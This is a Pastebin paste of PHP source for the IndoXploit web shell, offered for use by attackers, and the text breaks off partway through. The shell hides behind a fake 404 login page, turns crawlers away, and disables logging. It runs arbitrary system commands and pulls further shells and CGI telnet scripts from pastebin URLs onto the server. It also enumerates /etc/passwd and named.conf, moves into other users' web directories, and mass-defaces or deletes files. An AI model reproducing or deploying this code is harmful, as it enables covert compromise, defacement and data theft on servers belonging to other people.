restugbk

recode

Apr 15th, 2020
40
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 98.72 KB | None | 0 0
  1. <?php
  2. #RecodedByICoderTeam
  3.  
  4. error_reporting(0);
  5. @set_time_limit(0);
  6. @session_start();
  7. @session_start();
  8. @error_reporting(0);
  9. @ini_set('error_log',NULL);
  10. @ini_set('log_errors',0);
  11. @ini_set('html_errors',0);
  12. @ini_set('max_execution_time',0);
  13. @ini_set('output_buffering',0);
  14. @ini_set('display_errors', 0);
  15. @ini_set('file_uploads',1);
  16. @set_time_limit(0);
  17. @clearstatcache();
  18. @set_time_limit(0);
  19. @session_start();
  20. @session_start();
  21. @error_reporting(0);
  22. @ini_set('error_log',NULL);
  23. @ini_set('log_errors',0);
  24. @ini_set('html_errors',0);
  25. @ini_set('max_execution_time',0);
  26. @ini_set('output_buffering',0);
  27. @ini_set('display_errors', 0);
  28. @ini_set('file_uploads',1);
  29. @set_time_limit(0);
  30. @clearstatcache();
  31. $xSoftware = trim(getenv("SERVER_SOFTWARE"));
  32. $xServerName = $_SERVER["HTTP_HOST"];
  33. $xPass = $_POST['pass'];
  34. $xCheck_login = 1;
  35. $xPassword = "nubi";
  36. $xName = "yam";
  37. if($xPass == $xPassword){
  38. $_SESSION['login'] = "$xPass";
  39. }
  40. if($xCheck_login){
  41. if(!isset($_SESSION['login']) or $_SESSION['login'] != $xPassword){
  42. die("
  43. <html>
  44. <head>
  45. <title>404 Not Found</title>
  46. <style type=\"text/css\">
  47. input{
  48. margin:0;
  49. background-color:#fff;
  50. border:1px solid #fff;
  51. }
  52. </style>
  53. </head>
  54.  
  55. <body>
  56. <h1>Not Found</h1>
  57. <p>The requested URL was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle your fucking request.</p>
  58. <hr>
  59. <address>".$xSoftware." Server at ".$xServerName." Port 80 </address>
  60. <br />
  61. <br />
  62. <br />
  63. <br />
  64. <br />
  65. <br />
  66. <br />
  67. <br />
  68. <br />
  69. <br />
  70. <br />
  71. <br />
  72. <br />
  73. <center>
  74. <form method=\"post\">
  75. <input type=\"password\" name=\"pass\">
  76. </form>
  77. </center>
  78. </body>
  79. </html>
  80. ");
  81. }
  82. }
  83. session_start();
  84. @error_reporting(0);
  85. @set_time_limit(0);
  86.  
  87. @clearstatcache();
  88. @ini_set('error_log',NULL);
  89. @ini_set('log_errors',0);
  90. @ini_set('max_execution_time',0);
  91. @ini_set('output_buffering',0);
  92. @ini_set('display_errors', 0);
  93.  
  94. $password = "7b4939a8af28c814f0c757bb10f40d3d"; # md5: IndoXploit
  95.  
  96. $SERVERIP = (!$_SERVER['SERVER_ADDR']) ? gethostbyname($_SERVER['HTTP_HOST']) : $_SERVER['SERVER_ADDR'];
  97. $FILEPATH = str_replace($_SERVER['DOCUMENT_ROOT'], "", path());
  98.  
  99. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  100. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl");
  101. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  102. header('HTTP/1.0 404 Not Found');
  103. exit;
  104. }
  105. }
  106.  
  107. function login_shell() {
  108. ?>
  109. <!DOCTYPE HTML>
  110. <html>
  111. <head>
  112. <title>IndoXploit</title>
  113. <style type="text/css">
  114. html {
  115. margin: 20px auto;
  116. background: #000000;
  117. color: green;
  118. text-align: center;
  119. }
  120. header {
  121. color: green;
  122. margin: 10px auto;
  123. }
  124. input[type=password] {
  125. width: 250px;
  126. height: 25px;
  127. color: red;
  128. background: transparent;
  129. border: 1px dotted green;
  130. margin-left: 20px;
  131. text-align: center;
  132. }
  133. </style>
  134. </head>
  135. <center>
  136. <header>
  137. <pre>
  138. ___________________________
  139. < root@indoxploit:~# w00t??? >
  140. ---------------------------
  141. \ , ,
  142. \ /( )`
  143. \ \ \___ / |
  144. /- _ `-/ '
  145. (/\/ \ \ /\
  146. / / | ` \
  147. O O ) / |
  148. `-^--'`< '
  149. (_.) _ ) /
  150. `.___/` /
  151. `-----' /
  152. <----. __ / __ \
  153. <----|====O)))==) \) /====>
  154. <----' `--' `.__,' \
  155. | |
  156. \ /
  157. ______( (_ / \______
  158. ,' ,-----' | \
  159. `--{__________) \/
  160. </pre>
  161. </header>
  162. <form method="post">
  163. <input type="password" name="password">
  164. </form>
  165. <?php
  166. exit;
  167. }
  168.  
  169. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  170. if(empty($password) || (isset($_POST['password']) && (md5($_POST['password']) == $password)))
  171. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  172. else
  173. login_shell();
  174.  
  175. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  176. @ob_clean();
  177. $file = $_GET['file'];
  178. header('Content-Description: File Transfer');
  179. header('Content-Type: application/octet-stream');
  180. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  181. header('Expires: 0');
  182. header('Cache-Control: must-revalidate');
  183. header('Pragma: public');
  184. header('Content-Length: ' . filesize($file));
  185. readfile($file);
  186. exit;
  187. }
  188.  
  189. if(get_magic_quotes_gpc()) {
  190. function idx_ss($array) {
  191. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  192. }
  193. $_POST = idx_ss($_POST);
  194. }
  195. ?>
  196. <!DOCTYPE HTML>
  197. <html>
  198. <!--
  199. ###############################################################################
  200. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
  201. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
  202. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
  203. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
  204. // Greetz: All Member IndoXploit. & All My Friends.
  205. ###############################################################################
  206. // Special Thanks: Depok Cyber Security | Sanjungan Jiwa | 0x1999
  207. ###############################################################################
  208. -->
  209. <head>
  210. <title>IndoXploit</title>
  211. <meta name='author' content='IndoXploit'>
  212. <meta charset="UTF-8">
  213. <style type='text/css'>
  214. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  215. html {
  216. background: #000000;
  217. color: #ffffff;
  218. font-size: 14px;
  219. width: 100%;
  220. }
  221.  
  222. li {
  223. display: inline;
  224. margin: 5px;
  225. padding: 5px;
  226. }
  227.  
  228. a {
  229. color: #ffffff;
  230. text-decoration: none;
  231. }
  232.  
  233. a:hover {
  234. color: gold;
  235. text-decoration: underline;
  236. }
  237.  
  238. b {
  239. color: gold;
  240. }
  241.  
  242. pre {
  243. font-size: 13px;
  244. }
  245.  
  246. table, th, td {
  247. border-collapse:collapse;
  248. background: transparent;
  249. font-family: 'Ubuntu';
  250. font-size: 13px;
  251. }
  252.  
  253. .table_home, .th_home, .td_home {
  254. border: 1px solid #ffffff;
  255. }
  256.  
  257. .th_home {
  258. color: lime;
  259. }
  260.  
  261. .td_home, .td_home > a {
  262. color: #ffffff;
  263. }
  264.  
  265. .td_home > a:hover {
  266. color: gold;
  267. }
  268.  
  269. th {
  270. padding: 10px;
  271. }
  272.  
  273. tr:hover {
  274. background: #006400;
  275. color: #ffffff;
  276. }
  277.  
  278. input[type=text], input[type=password], .input {
  279. background: transparent;
  280. color: #ffffff;
  281. border: 1px solid #ffffff;
  282. padding: 3px;
  283. font-family: 'Ubuntu';
  284. font-size: 13px;
  285. }
  286.  
  287. input[type=submit] {
  288. padding: 2px;}
  289.  
  290. input[type=submit]:hover {
  291. cursor: pointer;
  292. }
  293.  
  294. input:focus, textarea:focus {
  295. outline: 0;
  296. border-color: #ffffff;
  297. }
  298.  
  299. textarea {
  300. border: 1px solid #ffffff;
  301. width: 100%;
  302. height: 400px;
  303. padding-left: 5px;
  304. margin: 10px auto;
  305. resize: none;
  306. background: transparent;
  307. color: #ffffff;
  308. font-family: 'Ubuntu';
  309. font-size: 13px;
  310. }
  311. iframe {
  312. width: 100%;
  313. min-height: 500px;
  314. }
  315. </style>
  316. </head>
  317. <body>
  318. <?php
  319. function path() {
  320. if(isset($_GET['dir'])) {
  321. $dir = str_replace("\\", "/", $_GET['dir']);
  322. @chdir($dir);
  323. } else {
  324. $dir = str_replace("\\", "/", getcwd());
  325. }
  326. return $dir;
  327. }
  328.  
  329. function color($bold = 1, $colorid = null, $string = null) {
  330. $color = array(
  331. "</font>", # 0 off
  332. "<font color='red'>", # 1 red
  333. "<font color='lime'>", # 2 lime
  334. "<font color='white'>", # 3 white
  335. "<font color='gold'>", # 4 gold
  336. );
  337.  
  338. return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid];
  339. }
  340.  
  341. function OS() {
  342. return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux";
  343. }
  344.  
  345. function exe($cmd) {
  346. if(function_exists('system')) {
  347. @ob_start();
  348. @system($cmd);
  349. $buff = @ob_get_contents();
  350. @ob_end_clean();
  351. return $buff;
  352. } elseif(function_exists('exec')) {
  353. @exec($cmd,$results);
  354. $buff = "";
  355. foreach($results as $result) {
  356. $buff .= $result;
  357. } return $buff;
  358. } elseif(function_exists('passthru')) {
  359. @ob_start();
  360. @passthru($cmd);
  361. $buff = @ob_get_contents();
  362. @ob_end_clean();
  363. return $buff;
  364. } elseif(function_exists('shell_exec')) {
  365. $buff = @shell_exec($cmd);
  366. return $buff;
  367. }
  368. }
  369.  
  370. function save($filename, $mode, $file) {
  371. $handle = fopen($filename, $mode);
  372. fwrite($handle, $file);
  373. fclose($handle);
  374. return;
  375. }
  376.  
  377. function getfile($name) {
  378. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't spawn $name."));
  379. if($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php");
  380. elseif($name === "webconsole") $get = array("https://pastebin.com/raw/2i96fDCN", "webconsole.php");
  381. elseif($name === "cgitelnet1") $get = array("https://pastebin.com/raw/Lj46KxFT", "idx_cgi/cgitelnet1.idx");
  382. elseif($name === "cgitelnet2") $get = array("https://pastebin.com/raw/aKL2QWfS", "idx_cgi/cgitelnet2.idx");
  383. elseif($name === "LRE") $get = array("https://pastebin.com/raw/PVPfA21i", "makman.php");
  384.  
  385. $fp = fopen($get[1], "w");
  386. $ch = curl_init();
  387. curl_setopt($ch, CURLOPT_URL, $get[0]);
  388. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  389. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  390. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  391. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  392. curl_setopt($ch, CURLOPT_FILE, $fp);
  393. return curl_exec($ch);
  394. curl_close($ch);
  395. fclose($fp);
  396. ob_flush();
  397. flush();
  398. }
  399.  
  400. function usergroup() {
  401. if(!function_exists('posix_getegid')) {
  402. $user['name'] = @get_current_user();
  403. $user['uid'] = @getmyuid();
  404. $user['gid'] = @getmygid();
  405. $user['group'] = "?";
  406. } else {
  407. $user['uid'] = @posix_getpwuid(posix_geteuid());
  408. $user['gid'] = @posix_getgrgid(posix_getegid());
  409. $user['name'] = $user['uid']['name'];
  410. $user['uid'] = $user['uid']['uid'];
  411. $user['group'] = $user['gid']['name'];
  412. $user['gid'] = $user['gid']['gid'];
  413. }
  414. return (object) $user;
  415. }
  416.  
  417. function getuser() {
  418. $fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can't read /etc/passwd"));
  419. while($read = fgets($fopen)) {
  420. preg_match_all('/(.*?):x:/', $read, $getuser);
  421. $user[] = $getuser[1][0];
  422. }
  423. return $user;
  424. }
  425.  
  426. function getdomainname() {
  427. $fopen = fopen("/etc/named.conf", "r");
  428. while($read = fgets($fopen)) {
  429. preg_match_all("#/var/named/(.*?).db#", $read, $getdomain);
  430. $domain[] = $getdomain[1][0];
  431. }
  432. return $domain;
  433. }
  434.  
  435. function hddsize($size) {
  436. if($size >= 1073741824)
  437. return sprintf('%1.2f',$size / 1073741824 ).' GB';
  438. elseif($size >= 1048576)
  439. return sprintf('%1.2f',$size / 1048576 ) .' MB';
  440. elseif($size >= 1024)
  441. return sprintf('%1.2f',$size / 1024 ) .' KB';
  442. else
  443. return $size .' B';
  444. }
  445.  
  446. function hdd() {
  447. $hdd['size'] = hddsize(disk_total_space("/"));
  448. $hdd['free'] = hddsize(disk_free_space("/"));
  449. $hdd['used'] = hddsize(disk_total_space("/") - disk_free_space("/"));
  450. return (object) $hdd;
  451. }
  452.  
  453. function writeable($path, $perms) {
  454. return (!is_writable($path)) ? color(1, 1, $perms) : color(1, 2, $perms);
  455. }
  456.  
  457. function perms($path) {
  458. $perms = fileperms($path);
  459. if (($perms & 0xC000) == 0xC000) {
  460. // Socket
  461. $info = 's';
  462. }
  463. elseif (($perms & 0xA000) == 0xA000) {
  464. // Symbolic Link
  465. $info = 'l';
  466. }
  467. elseif (($perms & 0x8000) == 0x8000) {
  468. // Regular
  469. $info = '-';
  470. }
  471. elseif (($perms & 0x6000) == 0x6000) {
  472. // Block special
  473. $info = 'b';
  474. }
  475. elseif (($perms & 0x4000) == 0x4000) {
  476. // Directory
  477. $info = 'd';
  478. }
  479. elseif (($perms & 0x2000) == 0x2000) {
  480. // Character special
  481. $info = 'c';
  482. }
  483. elseif (($perms & 0x1000) == 0x1000) {
  484. // FIFO pipe
  485. $info = 'p';
  486. }
  487. else {
  488. // Unknown
  489. $info = 'u';
  490. }
  491. // Owner
  492. $info .= (($perms & 0x0100) ? 'r' : '-');
  493. $info .= (($perms & 0x0080) ? 'w' : '-');
  494. $info .= (($perms & 0x0040) ?
  495. (($perms & 0x0800) ? 's' : 'x' ) :
  496. (($perms & 0x0800) ? 'S' : '-'));
  497. // Group
  498. $info .= (($perms & 0x0020) ? 'r' : '-');
  499. $info .= (($perms & 0x0010) ? 'w' : '-');
  500. $info .= (($perms & 0x0008) ?
  501. (($perms & 0x0400) ? 's' : 'x' ) :
  502. (($perms & 0x0400) ? 'S' : '-'));
  503. // World
  504. $info .= (($perms & 0x0004) ? 'r' : '-');
  505. $info .= (($perms & 0x0002) ? 'w' : '-');
  506. $info .= (($perms & 0x0001) ?
  507. (($perms & 0x0200) ? 't' : 'x' ) :
  508. (($perms & 0x0200) ? 'T' : '-'));
  509.  
  510. return $info;
  511. }
  512.  
  513. function lib_installed() {
  514. $lib[] = "MySQL: ".(function_exists('mysql_connect') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  515. $lib[] = "cURL: ".(function_exists('curl_version') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  516. $lib[] = "WGET: ".(exe('wget --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  517. $lib[] = "Perl: ".(exe('perl --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  518. $lib[] = "Python: ".(exe('python --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  519. return implode(" | ", $lib);
  520. }
  521.  
  522. function pwd() {
  523. $dir = explode("/", path());
  524. foreach($dir as $key => $index) {
  525. print "<a href='?dir=";
  526. for($i = 0; $i <= $key; $i++) {
  527. print $dir[$i];
  528. if($i != $key) {
  529. print "/";
  530. }
  531. }
  532. print "'>$index</a>/";
  533. }
  534. print "<br>";
  535. print (OS() === "Windows") ? windisk() : "";
  536. }
  537.  
  538. function windisk() {
  539. $letters = "";
  540. $v = explode("\\", path());
  541. $v = $v[0];
  542. foreach(range("A", "Z") as $letter) {
  543. $bool = $isdiskette = in_array($letter, array("A"));
  544. if(!$bool) $bool = is_dir("$letter:\\");
  545. if($bool) {
  546. $letters .= "[ <a href='?dir=$letter:\\'".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">";
  547. if($letter.":" != $v) {
  548. $letters .= $letter;
  549. }
  550. else {
  551. $letters .= color(1, 2, $letter);
  552. }
  553. $letters .= "</a> ]";
  554. }
  555. }
  556. if(!empty($letters)) {
  557. print "Detected Drives $letters<br>";
  558. }
  559. if(count($quicklaunch) > 0) {
  560. foreach($quicklaunch as $item) {
  561. $v = realpath(path(). "..");
  562. if(empty($v)) {
  563. $a = explode(DIRECTORY_SEPARATOR,path());
  564. unset($a[count($a)-2]);
  565. $v = join(DIRECTORY_SEPARATOR, $a);
  566. }
  567. print "<a href='".$item[1]."'>".$item[0]."</a>";
  568. }
  569. }
  570. }
  571.  
  572. function serverinfo() {
  573. $disable_functions = @ini_get('disable_functions');
  574. $disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE");
  575.  
  576. $output[] = "SERVER IP ".color(1, 2, $GLOBALS['SERVERIP'])." / YOUR IP ".color(1, 2, $_SERVER['REMOTE_ADDR']);
  577. $output[] = "WEB SERVER : ".color(1, 2, $_SERVER['SERVER_SOFTWARE']);
  578. $output[] = "SYSTEM : ".color(1, 2, php_uname());
  579. $output[] = "USER / GROUP: ".color(1, 2, usergroup()->name)."(".color(1, 2 , usergroup()->uid).") / ".color(1, 2 , usergroup()->group)."(".color(1, 2 , usergroup()->gid).")";
  580. $output[] = "HDD : ".color(1, 2, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(1, 2 , hdd()->free).")";
  581. $output[] = "PHP VERSION : ".color(1, 2, @phpversion());
  582. $output[] = "SAFE MODE : ".(@ini_get(strtoupper("safe_mode")) === "ON" ? color(1, 2, "ON") : color(1, 2, "OFF"));
  583. $output[] = "DISABLE FUNC: $disable_functions";
  584. $output[] = lib_installed();
  585. $output[] = "Current Dir (".writeable(path(), perms(path())).") ";
  586.  
  587. print "<pre>";
  588. print implode("<br>", $output);
  589. pwd();
  590. print "</pre>";
  591.  
  592. }
  593.  
  594. function curl($url, $post = false, $data = null) {
  595. $ch = curl_init($url);
  596. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  597. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  598. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  599. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  600. curl_setopt($ch, CURLOPT_TIMEOUT, 10);
  601. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  602. if($post) {
  603. curl_setopt($ch, CURLOPT_POST, true);
  604. curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  605. }
  606. return curl_exec($ch);
  607. curl_close($ch);
  608. }
  609.  
  610. function reverse() {
  611. $response = curl("http://domains.yougetsignal.com/domains.php", TRUE, "remoteAddress=".$GLOBALS['SERVERIP']."&ket=");
  612. $response = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $response)))))))))))));
  613. $explode = explode(",,", $response);
  614. unset($explode[0]);
  615.  
  616. foreach($explode as $domain) {
  617. $domain = "http://$domain";
  618. $domain = str_replace(",", "", $domain);
  619. $url[] = $domain;
  620. ob_flush();
  621. flush();
  622. }
  623.  
  624. return $url;
  625. }
  626.  
  627. function getValue($param, $kata1, $kata2){
  628. if(strpos($param, $kata1) === FALSE) return FALSE;
  629. if(strpos($param, $kata2) === FALSE) return FALSE;
  630. $start = strpos($param, $kata1) + strlen($kata1);
  631. $end = strpos($param, $kata2, $start);
  632. $return = substr($param, $start, $end - $start);
  633. return $return;
  634. }
  635.  
  636. function massdeface($dir, $file, $filename, $type = null) {
  637. $scandir = scandir($dir);
  638. foreach($scandir as $dir_) {
  639. $path = "$dir/$dir_";
  640. $location = "$path/$filename";
  641. if($dir_ === "." || $dir_ === "..") {
  642. file_put_contents($location, $file);
  643. }
  644. else {
  645. if(is_dir($path) AND is_writable($path)) {
  646. print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."<br>";
  647. file_put_contents($location, $file);
  648. if($type === "-alldir") {
  649. massdeface($path, $file, $filename, "-alldir");
  650. }
  651. }
  652. }
  653. }
  654. }
  655.  
  656. function massdelete($dir, $filename) {
  657. $scandir = scandir($dir);
  658. foreach($scandir as $dir_) {
  659. $path = "$dir/$dir_";
  660. $location = "$path/$filename";
  661. if($dir_ === '.') {
  662. if(file_exists("$dir/$filename")) {
  663. unlink("$dir/$filename");
  664. }
  665. }
  666. elseif($dir_ === '..') {
  667. if(file_exists(dirname($dir)."/$filename")) {
  668. unlink(dirname($dir)."/$filename");
  669. }
  670. }
  671. else {
  672. if(is_dir($path) AND is_writable($path)) {
  673. if(file_exists($location)) {
  674. print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."<br>";
  675. unlink($location);
  676. massdelete($path, $filename);
  677. }
  678. }
  679. }
  680. }
  681. }
  682.  
  683. function tools($toolsname, $args = null) {
  684. if($toolsname === "cmd") {
  685. print "<form method='post' action='?do=cmd&dir=".path()."' style='margin-top: 15px;'>
  686. ".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $
  687. <input style='border: none; border-bottom: 1px solid #ffffff;' type='text' name='cmd' required>
  688. <input style='border: none; border-bottom: 1px solid #ffffff;' class='input' type='submit' value='>>'>
  689. </form>";
  690. }
  691. elseif($toolsname === "readfile") {
  692. if(empty($args)) die(color(1, 1, $msg));
  693. if(!is_file($args)) die(color(1, 1, "File '$args' is not exists."));
  694.  
  695. print "<pre>";
  696. print htmlspecialchars(file_get_contents($args));
  697. print "</pre>";
  698. }
  699. elseif($toolsname === "spawn") {
  700. if($args === "adminer") {
  701. if(file_exists("adminer.php")) {
  702. print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
  703. }
  704. else {
  705. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Adminer'."));
  706. if(getfile("adminer")) {
  707. print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
  708. }
  709. else {
  710. print color(1, 1, "Error while downloading file Adminer.");
  711. @unlink("adminer.php");
  712. }
  713. }
  714. }
  715. elseif($args === "webconsole") {
  716. if(file_exists("webconsole.php")) {
  717. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
  718. }
  719. else {
  720. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'WebConsole'."));
  721. if(getfile("webconsole")) {
  722. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
  723. }
  724. else {
  725. print color(1, 1, "Error while downloading file WebConsole.");
  726. @unlink("webconsole.php");
  727. }
  728. }
  729. }
  730. elseif($args === "cgitelnet1") {
  731. if(file_exists("idx_cgi/cgitelnet1.idx")) {
  732. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
  733. }
  734. elseif(file_exists('cgitelnet1.idx')) {
  735. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
  736. }
  737. else {
  738. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
  739. if(!is_dir(path()."/idx_cgi/")) {
  740. @mkdir('idx_cgi', 0755);
  741. save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
  742. }
  743. if(getfile("cgitelnet1")) {
  744. chmod('idx_cgi/cgitelnet1.idx', 0755);
  745. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
  746. }
  747. else {
  748. print color(1, 1, "Error while downloading file CGI Telnet.");
  749. @rmdir(path()."/idx_cgi/");
  750. if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
  751. if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
  752. }
  753. }
  754.  
  755. }
  756. elseif($args === "cgitelnet2") {
  757. if(file_exists("idx_cgi/cgitelnet2.idx")) {
  758. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
  759. }
  760. elseif(file_exists('cgitelnet2.idx')) {
  761. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet2.idx' frameborder='0' scrolling='no'></iframe>";
  762. }
  763. else {
  764. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
  765. if(!is_dir(path()."/idx_cgi/")) {
  766. @mkdir('idx_cgi', 0755);
  767. save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
  768. }
  769. if(getfile("cgitelnet2")) {
  770. chmod('idx_cgi/cgitelnet2.idx', 0755);
  771. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
  772. }
  773. else {
  774. print color(1, 1, "Error while downloading file CGI Telnet.");
  775. @rmdir(path()."/idx_cgi/");
  776. if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
  777. if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
  778. }
  779. }
  780.  
  781. }
  782. elseif($args === "phpinfo") {
  783. if(file_exists('phpinfo.php') AND preg_match("/phpinfo()/", file_get_contents('phpinfo.php'))) {
  784. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
  785. }
  786. else {
  787. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'phpinfo'."));
  788. save("phpinfo.php", "w", "<?php print '<html><style>html,body {background: #000000;}</style><div style=\'background: #000000; color: #cccccc;\'>'; phpinfo(); print '</div></html>'; ?>");
  789. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
  790. }
  791. }
  792. }
  793. elseif($toolsname === "upload") {
  794. if($_POST['upload']) {
  795. if($_POST['uploadtype'] === '1') {
  796. if(@copy($_FILES['file']['tmp_name'], path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."")) {
  797. $act = color(1, 2, "Uploaded!")." at <i><b>".path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."</b></i>";
  798. }
  799. else {
  800. $act = color(1, 1, "Failed to upload file!");
  801. }
  802. }
  803. elseif($_POST['uploadtype'] === '2') {
  804. $root = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
  805. $web = $_SERVER['HTTP_HOST'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
  806. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  807. if(@copy($_FILES['file']['tmp_name'], $root)) {
  808. $act = color(1, 2, "Uploaded!")." at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  809. }
  810. else {
  811. $act = color(1, 1, "Failed to upload file!");
  812. }
  813. }
  814. else {
  815. $act = color(1, 1, "Failed to upload file!");
  816. }
  817. }
  818. }
  819. print "Upload File: $act
  820. <form method='post' enctype='multipart/form-data'>
  821. <input type='radio' name='uploadtype' value='1' checked>current_dir [ ".writeable(path(), "Writeable")." ]
  822. <input type='radio' name='uploadtype' value='2'>document_root [ ".writeable($_SERVER['DOCUMENT_ROOT'], "Writeable")." ]<br>
  823. <input type='file' name='file'>
  824. <input type='submit' value='upload' name='upload'>
  825. </form>";
  826. }
  827. elseif($toolsname === "jumping") {
  828. $i = 0;
  829. foreach(getuser() as $user) {
  830. $path = "/home/$user/public_html";
  831. if(is_readable($path)) {
  832. $status = color(1, 2, "[R]");
  833. if(is_writable($path)) {
  834. $status = color(1, 2, "[RW]");
  835. }
  836. $i++;
  837. print "$status <a href='?dir=$path'>".color(1, 4, $path)."</a>";
  838. if(!function_exists('posix_getpwuid')) print "<br>";
  839. if(!getdomainname()) print " => ".color(1, 1, "Can't get domain name")."<br>";
  840. foreach(getdomainname() as $domain) {
  841. $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
  842. $userdomain = $userdomain->name;
  843. if($userdomain === $user) {
  844. print " => <a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
  845. break;
  846. }
  847. }
  848. }
  849. }
  850. print ($i === 0) ? "" : "<p>".color(1, 3, "Total ada $i kamar di ".$GLOBALS['SERVERIP'])."</p>";
  851. }
  852. elseif($toolsname === "idxconfig") {
  853. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_config'."));
  854. if(!is_dir(path()."/idx_config/")) {
  855. @mkdir('idx_config', 0755);
  856. $htaccess = "Options all\nDirectoryIndex indoxploit.htm\nSatisfy Any";
  857. save("idx_config/.htaccess","w", $htaccess);
  858.  
